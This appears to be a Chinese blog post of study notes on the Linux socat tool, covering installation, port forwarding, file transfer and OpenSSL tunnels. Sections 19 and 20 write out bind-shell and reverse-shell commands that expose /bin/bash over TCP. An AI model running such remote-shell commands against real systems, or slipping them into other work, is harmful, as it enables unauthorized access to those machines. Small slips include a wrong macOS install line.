Socat 入门笔记

又接到任务，让学习一下Linux中的Socat命令，故写下此篇学习笔记，小白一枚，大佬勿喷。

一、Socat 介绍

Socat 是 Linux 下的一个多功能的网络工具，名字来由是「Socket CAT」。其功能与有瑞士军刀之称的 Netcat 类似，可以看做是 Netcat 的加强版。

Socat 的主要特点就是在两个数据流之间建立通道，且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE、System、Open、Proxy、Openssl 等。

Socat 的官方网站：http://www.dest-unreach.org/socat/

二、Socat 安装

1、通过源码方式安装

1 $ wget http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz
2 $ tar zxf socat-1.7.3.2.tar.gz
3 $ cd socat-1.7.3.2
4 $ ./configure 
5 $ make   
6 $ make install

2、通过包安装

Centos

1 $ yum install -y socat

Debian/Ubuntu

1 $ apt-get install -y socat

macOS

1 socat [options] <address> <address>

三、Socat 基本用法

1 socat [options] <address> <address>

其中这 2 个 address 就是关键了，address 类似于一个文件描述符，Socat 所做的工作就是在 2 个 address 指定的描述符间建立一个 pipe 用于发送和接收数据。几个常用的 address 描述方式如下：

-, STDIN, STDOUT 表示标准输入输出，可以就用一个横杠代替。
/var/log/syslog 打开一个文件作为数据流，可以是任意路径。
TCP:: 建立一个 TCP 连接作为数据流，TCP 也可以替换为 UDP 。
TCP-LISTEN: 建立一个TCP监听端口，TCP 也可以替换为 UDP。
EXEC: 执行一个程序作为数据流。

以上规则中前面的 TCP 等都可以小写，在这些描述后可以附加一些选项，用逗号隔开。如 fork，reuseaddr，stdin，stdout，ctty 等。

四、Socat 使用实例

文件操作

1、通过Socat读文件

1 # 从绝对路径读取
2 $ socat - /var/www/html/flag.php 

3 # 从相对路径读取
4 $ socat - ./flag.php

2、通过Socat写文件

1 $ echo "This is Test" | socat - /tmp/hello.html

网络管理

3、连接远程端口

1 $ socat - TCP:192.168.1.252:3306

4、监听一个新端口

1 $ socat TCP-LISTEN:7000 -

端口转发

在实际生产中我们经常会遇到到一个场景就是，用一台机器作为转发服务器，连接 AB 两个网段，将转发服务器的某个端口上的流量转发到 B 网段的某台机器的某个端口，这样 A 网段的服务器就可以通过访问转发服务器上的端口访问到 B 网段的服务器端口。

这样的场景一般在和客户建立专线的连接时候经常用到，一般也可以采用 iptables 做转发，但是比较复杂。Socat 可以很轻松的完成这个功能，但是 Socat 不支持端口段转发，只适用于单端口或者少量端口。

5、转发TCP

监听 192.168.1.252 网卡的 15672 端口，并将请求转发至 172.17.0.15 的 15672 端口。

1 $ socat  -d -d -lf /var/log/socat.log TCP4-LISTEN:15672,bind=192.168.1.252,reuseaddr,fork TCP4:172.17.0.15:15672

参数说明：

①. -d -d 前面两个连续的 -d -d 代表调试信息的输出级别。
②. -lf /var/log/socat.log 指定输出信息的文件保存位置。
③. TCP4-LISTEN:15672 在本地建立一个 TCP IPv4 协议的监听端口，也就是转发端口。这里是 15672，请根据实际情况改成你自己需要转发的端口。
④. bind 指定监听绑定的 IP 地址，不绑定的话将监听服务器上可用的全部 IP。
⑤. reuseaddr 绑定一个本地端口。
⑥. fork TCP4:172.17.0.15:15672 指的是要转发到的服务器 IP 和端口，这里是 172.17.0.15 的 15672 端口。

6、转发UDP

1 $ socat -d -d -lf /var/log/socat.log UDP4-LISTEN:123,bind=192.168.1.252,reuseaddr,fork UDP4:172.17.0.15:123

7、NAT 映射

在一个 NAT 网络环境中，也是可以通过 Socat 将内部机器端口映射到公网上的。

在外部公网机器上执行

1 $ socat tcp-listen:1234 tcp-listen:3389

在内部公网机器上执行

1 $ socat tcp:outerhost:1234 tcp:192.168.1.34:3389

这样，你外部机器上的 3389 就映射在内网 192.168.1.34 的 3389 端口上了。

文件传递

8、文件传送

将文件 demo.tar.gz 使用 2000 端口从 192.168.1.252 传到 192.168.1.253,文件传输完毕后会自动退出。

在 192.168.1.252 上执行

1 $ socat -u open:demo.tar.gz tcp-listen:2000,reuseaddr

在 192.168.1.253 上执行

1 $ socat -u tcp:192.168.1.252:2000 open:demo.tar.gz,create

-u 表示数据传输模式为单向，从左面参数到右面参数。

9、读写分流功能

Socat 具有一个独特的读写分流功能，比如：可以实现一个假的 Web Server，客户端连过来之后就把 read.html 里面的内容传过去，同时把客户端的数据保存到 write.txt 里面。

1 $ socat open:read.html\!\!open:write.txt,create,append tcp-listen:8000,reuseaddr,fork

!! 符号用于合并读写流，前面的用于读，后面的用于写。由于 ! 在 Shell 中是特殊字符，所以这里在命令行中使用 \ 对其进行了转义。

10、监听一个 TCP 端口

1 $ socat tcp-listen:12345 -

11、向 TCP 端口发送数据

1 $ echo "test" | socat - tcp-connect:127.0.0.1:12345

12、监听一个 UDP 端口

1 $ socat udp-listen:23456 -

13、向一个 UDP 端口发送数据

1 $ echo "test" | socat - udp-connect:127.0.0.1:23456

14、监听一个 Unix Socket

1 $ socat unix-listen:/tmp/unix.socket -

15、向本地 Unix Socket 发送数据

1 $ echo "test" | socat - unix-connect:/tmp/unix.sock

16、监听本地 Unix Datagram Socket

1 $ socat unix-recvfrom:/tmp/unix.dg.sock -

17、向本地 Unix Datagram Socket 发送数据

1 $ echo "test" | socat - unix-sendto:/tmp/unix.dg.sock

18、通过 Openssl 来加密传输过程

假设有一个服务器主机，地址为 server.domain.org。并且服务端程序使用 4433 端口。为了尽可能的简单，我们使用一个非常简单的服务功能，即服务端仅回显数据（echo），客户端只进行标准输入（stdio）。要进行 Openssl 加密数据传输，首先需要生成 Openssl 证书。

① 生成服务端的证书

1 # 为服务端的证书取一个基本的名字。
2 $ FILENAME=server
3 # 生成公钥私钥对。
4 $ openssl genrsa -out $FILENAME.key 1024
5 # 生成一个自签名的证书，会提示你输入国家代号、姓名等，或者按下回车键跳过输入提示。
6 $ openssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt
7 # 用刚生成的密钥文件和证书文件来生成PEM文件。
8 $ cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

服务端证书生成完成后，复制信任证书 server.crt 到 SSL 客户端所在的主机上

② 生成客户端的证书

1 # 为客户端证书取一个不同的文件名
2 $ FILENAME=client

重复上述服务端生成证书的流程。然后复制 client.pem 到 SSL 客户端主机，复制 client.crt 到服务端主机。至此完成了证书交换，服务端有 server.pem、client.crt 两个文件，客户端有 client.pem 、server.crt 两个文件。

其次我们需要建立 Openssl 服务端，在服务端我们不再用 tcp-listen (tcp-l) ，而用 openssl-listen (ssl-l) 。cert 参数告诉 Socat 包含证书和私钥的文件，cafile 参数指向客户端的证书文件。如果客户端能提供相关联的私钥，我们则认为该连接是可靠的。

1 $ socat openssl-listen:4433,reuseaddr,cert=server.pem,cafile=client.crt echo

运行这个命令后，Socat 会在 4433 端口监听，并要求客户端进行身份验证。

最后在客户端建立一个加密的链接，用 openssl-connect 或者 ssl 替换你的 tcp-connect 或 tcp 地址关键字，然后添加 cert 和 cafile 选项。

1 $ socat stdio openssl-connect:server.domain.org:4433,cert=client.pem,cafile=server.crt
2 test
3 test

19、建立一个正向 Shell

服务端

1 # 在服务端 7005 端口建立一个 Shell。
2 $ socat TCP-LISTEN:7005,fork,reuseaddr EXEC:/bin/bash,pty,stderr
3 或者
4 $ socat TCP-LISTEN:7005,fork,reuseaddr system:bash,pty,stderr

客户端

1 # 连接到服务器的 7005 端口，即可获得一个 Shell。readline 是 GNU 的命令行编辑器，具有历史功能。
2 $ socat readline tcp:127.0.0.1:7005

20、反弹一个交互式的 Shell

当有主机连接服务端的 7005 端口时，将会发送客户端的 Shell 给服务端。

服务端

1 $ socat -,raw,echo=0 tcp-listen:7005

客户端

1 $ socat tcp-connect:192.168.1.252:7005 exec:'bash -li',pty,stderr,setsid,sigint,sane

21、fork 服务
将一个使用标准输入输出的单进程程序变为一个使用 fork 方法的多进程服务，非常方便

$ socat TCP-LISTEN:1234,reuseaddr,fork EXEC:./helloworld

22、将 U 盘进行网络共享

1 $ socat -d -d /dev/ttyUSB1,raw,nonblock,ignoreeof,cr,echo=0 TCP4-LISTEN:5555,reuseaddr

23、将终端转发到串口

$ socat READLINE,/dev/ttyS0,raw,echo=0,crnl

24、让 Socat 后台运行

默认情况下 Socat 只在前台运行，如果要让 Socat 一直在后台运行，可以使用 nohup 命令来保证其在后台一直运行。

$ nohup socat  -d -d -lf /var/log/socat.log TCP4-LISTEN:15672,bind=192.168.1.252,reuseaddr,fork TCP4:172.17.0.15:15672 &

除了 nohup 外，Linux 下让进程在后台运行的方法还很多，比如：screen、tmux 等。

在 Linux 中一切都是文件，无论是 Socket 还是其他设备。所以从理论上来说，一切能够在文件层级访问的内容都可以成为 Socat 的数据流的来源。2 个 address 可以任意发挥，能够做到的事情还有很多。这样比起来，Socket 的确比 Netcat 更加强大。

参考文档

https://www.google.com
http://t.cn/R3X3HV3
http://t.cn/R3X3u1o
http://t.cn/R3XB1oh
http://t.cn/R3aIcrh
http://t.cn/R39vQ0v
http://t.cn/R395hiP
http://t.cn/R399TKv

posted on 2020-07-28 17:15 太子丶阅读(5374) 评论(0) 编辑收藏举报